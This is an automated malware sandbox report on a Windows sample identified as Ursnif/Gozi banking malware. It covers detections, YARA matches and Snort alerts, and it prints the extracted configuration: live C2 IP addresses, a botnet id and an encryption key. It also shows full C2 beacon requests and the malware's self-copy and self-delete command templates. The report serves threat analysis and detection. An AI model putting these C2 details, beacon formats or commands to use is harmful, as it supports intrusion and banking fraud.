Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
server.exe

Overview

General Information

Sample Name:server.exe
Analysis ID:826072
MD5:7936264575923f443302a9bb14688ab7
SHA1:ea7a8b4d250529b84bfdfb80785603cee4d07bf9
SHA256:7efe8c83ab4ba8773421d7f897a1c490214118f7924d5a45868b070cae6899dd
Tags:agenziaentrateexegoziisfbITAmefmiseursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Snort IDS alert for network traffic
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls

Classification

  • System is w10x64
  • server.exe (PID: 5184 cmdline: C:\Users\user\Desktop\server.exe MD5: 7936264575923F443302A9BB14688AB7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1ce8:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      Click to see the 27 entries
      No Sigma rule has matched
      Timestamp:192.168.2.362.173.142.5149702802033203 03/14/23-10:06:33.670823
      SID:2033203
      Source Port:49702
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.394.103.183.15349703802033204 03/14/23-10:06:53.891804
      SID:2033204
      Source Port:49703
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.394.103.183.15349703802033203 03/14/23-10:06:53.891804
      SID:2033203
      Source Port:49703
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: server.exeReversingLabs: Detection: 35%
      Source: server.exeVirustotal: Detection: 50%Perma Link
      Source: server.exeJoe Sandbox ML: detected
      Source: 0.2.server.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

      Compliance

      barindex
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Networking

      barindex
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49702 -> 62.173.142.51:80
      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49703 -> 94.103.183.153:80
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49703 -> 94.103.183.153:80
      Source: global trafficHTTP traffic detected: GET /drew/JmbbhiAvjQPEy2fkKH5/C20MAuPZ3pJbSKGRkKMPd5/SPaafj6VQ7HYu/DXcg7FNf/0ruIDzX_2BCbmxrV40i30pn/_2Fl7_2FNm/RIlbjnVOY4JvDGYwT/ix3pE9ifpnwW/elLfsP9FYx5/Hz_2B8UXu3bbwG/02zNVOFS_2BJ4kciO41Pm/zImHSH7GQInU2lqP/DXjN6xEv0EFAj_2/BIgT9NZXb86r_2B9_2/BglAnU64W/pXOd3Bpq_2B6reFFKiya/vrT62aiDk4ODnu2FLTN/8RaHDJKURayKv5wSn6_2Be/98LSI75Q/Y.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /drew/YFRpxaGPy8aTA/lEGs8EM8/Li7lynDfGk0I7iN9t374AB4/_2F1sUMTN1/UEydFJqSZ58U_2F2I/_2BvyAdt9u0H/WCLmPUk5rVd/uPrGHMrocX5QVL/vZ2he4yFsZbEEyVtFNsbb/6QOP5S8lc_2FKLii/xRSfDf8YM_2FzYv/JxYXyyfiAzE2PV12L5/JuemxitNz/bnxpv6OPuPk9wUQcNjGi/ZDSmE4RX8aWzG6bOjDV/nfzi9OTwpfQDL9S9rr7z8q/2mJBpjpAq_2FS/pQy2VF6z/1Yqd6OeimKP7Ws/XDYic_2B/Y.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.103.183.153Connection: Keep-AliveCache-Control: no-cache
      Source: Joe Sandbox ViewASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
      Source: Joe Sandbox ViewASN Name: RATELE-ASRU RATELE-ASRU
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: unknownTCP traffic detected without corresponding DNS query: 94.103.183.153
      Source: server.exe, 00000000.00000002.513808109.000000000228C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://94.103
      Source: unknownDNS traffic detected: queries for: checklist.skype.com
      Source: global trafficHTTP traffic detected: GET /drew/JmbbhiAvjQPEy2fkKH5/C20MAuPZ3pJbSKGRkKMPd5/SPaafj6VQ7HYu/DXcg7FNf/0ruIDzX_2BCbmxrV40i30pn/_2Fl7_2FNm/RIlbjnVOY4JvDGYwT/ix3pE9ifpnwW/elLfsP9FYx5/Hz_2B8UXu3bbwG/02zNVOFS_2BJ4kciO41Pm/zImHSH7GQInU2lqP/DXjN6xEv0EFAj_2/BIgT9NZXb86r_2B9_2/BglAnU64W/pXOd3Bpq_2B6reFFKiya/vrT62aiDk4ODnu2FLTN/8RaHDJKURayKv5wSn6_2Be/98LSI75Q/Y.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /drew/YFRpxaGPy8aTA/lEGs8EM8/Li7lynDfGk0I7iN9t374AB4/_2F1sUMTN1/UEydFJqSZ58U_2F2I/_2BvyAdt9u0H/WCLmPUk5rVd/uPrGHMrocX5QVL/vZ2he4yFsZbEEyVtFNsbb/6QOP5S8lc_2FKLii/xRSfDf8YM_2FzYv/JxYXyyfiAzE2PV12L5/JuemxitNz/bnxpv6OPuPk9wUQcNjGi/ZDSmE4RX8aWzG6bOjDV/nfzi9OTwpfQDL9S9rr7z8q/2mJBpjpAq_2FS/pQy2VF6z/1Yqd6OeimKP7Ws/XDYic_2B/Y.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 94.103.183.153Connection: Keep-AliveCache-Control: no-cache

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398146053.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398126979.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398008466.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398107803.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.513904816.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398084556.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398172472.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5184, type: MEMORYSTR

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398146053.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398126979.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398008466.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398107803.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.513904816.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398084556.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.398172472.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5184, type: MEMORYSTR

      System Summary

      barindex
      Source: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.398146053.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.398146053.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.398126979.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.398126979.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.398008466.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.398008466.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.398107803.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.398107803.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.513904816.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000002.513904816.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.513699269.00000000005B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000003.398084556.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.398084556.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.398172472.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.398172472.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: Process Memory Space: server.exe PID: 5184, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: server.exe PID: 5184, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.513562635.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.398058433.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.398160949.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.398146053.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.398146053.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.398126979.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.398126979.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.398008466.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.398008466.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.398107803.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.398107803.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.513904816.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000002.513904816.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.513699269.00000000005B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000003.398084556.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
